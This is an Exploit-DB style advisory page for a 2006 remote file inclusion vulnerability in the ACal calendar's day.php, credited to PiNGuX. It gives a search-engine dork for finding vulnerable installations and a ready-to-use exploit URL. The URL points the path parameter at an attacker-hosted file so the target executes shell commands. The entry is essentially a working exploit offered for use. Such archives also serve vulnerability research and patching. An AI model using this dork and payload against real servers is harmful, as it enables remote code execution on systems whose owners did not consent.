ACal <= 2.2.6 (day.php) Remote File Inclusion Vulnerability

EDB-ID: 1763	CVE: 2006-2261	OSVDB-ID: 25340
Author: PiNGuX	Published: 2006-05-07	Verified:
Exploit Code:	Vulnerable App: N/A

$*******************************************$
$ Title: ACal 2.2.6 = Remote File Inclusion $
$*******************************************$
$ URL: http://acalproj.sourceforge.net/ $
$***************************************$
$ Dork: intitle:"Login to Calendar" $
$***********************************$
$ Credits: PiNGuX $
$*****************$
$ Greetz : [0o] $
$***************$

Exploit:
http://[url]/[calendar_path]/embed/day.php?path=http://yourhost/cmd.gif?cmd=ls

# milw0rm.com [2006-05-07]

Comments

ACal <= 2.2.6 (day.php) Remote File Inclusion Vulnerability

Rating

No comments so far